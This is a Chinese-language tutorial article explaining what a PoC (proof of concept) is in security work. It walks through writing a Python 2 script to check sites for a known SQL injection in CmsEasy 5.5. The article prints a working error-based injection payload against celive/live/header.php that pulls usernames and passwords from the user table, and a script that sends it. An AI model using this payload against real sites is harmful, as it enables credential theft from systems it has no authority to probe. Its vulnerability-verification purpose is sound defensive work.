溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

python中poc指的是什么意思

發(fā)布時間:2020-11-21 13:46:41 來源:億速云 閱讀:725 作者:小新 欄目:編程語言

小編給大家分享一下python中poc指的是什么意思,希望大家閱讀完這篇文章后大所收獲,下面讓我們一起去探討吧!

0x00 我們需要掌握的幾個的概念

PoC(全稱:Proof of Concept)中文意思是“觀點證明”。在安全行業(yè)中PoC則是一段驗證漏洞的程序,使我們能夠確認這個漏洞是真實存在的。

Python,是一種面向?qū)ο蟆⒔忉屝陀嬎銠C程序設(shè)計語言。常見的一些庫我們需要了解,比如:urllib,urllib2,re,request,socket等,本文我們要使用Python這門語言,Python的基礎(chǔ)知識我們不做講解。

SQL Injection,通過把SQL命令插入到Web表單遞交或輸入域名或頁面請求的查詢字符串,最終達到欺騙服務(wù)器執(zhí)行惡意的SQL命令。

0x01 PoC編寫流程

場景還原:某網(wǎng)站托管公司,旗下托管了數(shù)萬個站點,負責(zé)這些站點的安全,但是突然某一天,某知名CMS程序被爆出存在一個高危的SQL注入,某網(wǎng)管排查后發(fā)現(xiàn)旗下托管網(wǎng)站中存在幾百個站點使用該CMS程序,那么一個一個去排查是否存在該漏洞是非常繁瑣的,所以,我們需要一個PoC來驗證下。

·根據(jù)該漏洞詳情的描述,假設(shè)已知出現(xiàn)漏洞的CMS版本號為4.1,可以去其官網(wǎng)或者GitHub上去下載相對應(yīng)的版本。

·下載之后,模擬其服務(wù)器真實環(huán)境,本地進行搭建。根據(jù)漏洞描述,進行復(fù)現(xiàn),已SQL注入為例,重復(fù)提交不同的參數(shù),觀察不同的返回結(jié)果,同時注意如果該漏洞不存在出現(xiàn)的結(jié)果。

·根據(jù)漏洞復(fù)現(xiàn)的實際情況,進行PoC的編寫。

·PoC寫完之后需要進行相關(guān)的測試,已確保該PoC的編寫沒有問題,比如測試靶機程序,以及不存在漏洞的程序。

0x02 SQL Injection poc編寫

已知CmsEasy 5.5 UTF-8程序存在SQL注入,烏云漏洞中的漏洞細節(jié)比較詳細

(由于wooyun已經(jīng)暫停訪問,故不上鏈接了)。

·首先,我們需要下載其相關(guān)源碼,進行本地搭建。

閱讀漏洞細節(jié),我們得知其url與payload如下:

URL:http://xxx.xxx/celive/live/header.php Payload:xajax=LiveMessage&xajaxargs[0]=name',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from cmseasy_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)--%20

·漏洞復(fù)現(xiàn):我們根據(jù)其漏洞描述,進行復(fù)現(xiàn),該注入點需要發(fā)起一個Post請求,我們使用Firefox瀏覽器配合hackbar插件進行復(fù)現(xiàn),填入url與payload,發(fā)送,獲取其賬戶密碼。

漏洞效果如下:

python中poc指的是什么意思這樣,我們的漏洞就已經(jīng)復(fù)現(xiàn)成功了。接下來,我們來寫Poc。

#!/usr/bin/env python
# coding:utf-8
import urllib2
import urllib
import re
import sys
def verify(url):
target = '%s/celive/live/header.php' % url
#需要發(fā)送的數(shù)據(jù)
post_data = {
'xajax': 'LiveMessage',
'xajaxargs[0]': "name',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from cmseasy_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- " }
try:
#發(fā)送請求
req = urllib2.Request(target, data=urllib.urlencode(post_data))
response = urllib2.urlopen(req)
#處理請求,進行判斷
if response:
data = response.read()
if "XPATH syntax error" in data:
print "%s is vulnerable" % target
else:
print "%s is not vulnerable" % target

except Exception, e:
print "Something happend..."
print e
def main():
args = sys.argv
url = ""
if len(args) == 2:
url = args[1]
verify(url)
else:
print "Usage: python %s url" % (args[0])
if __name__ == '__main__':
main()

看完了這篇文章,相信你對python中poc指的是什么意思有了一定的了解,想了解更多相關(guān)知識,歡迎關(guān)注億速云行業(yè)資訊頻道,感謝各位的閱讀!

向AI問一下細節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI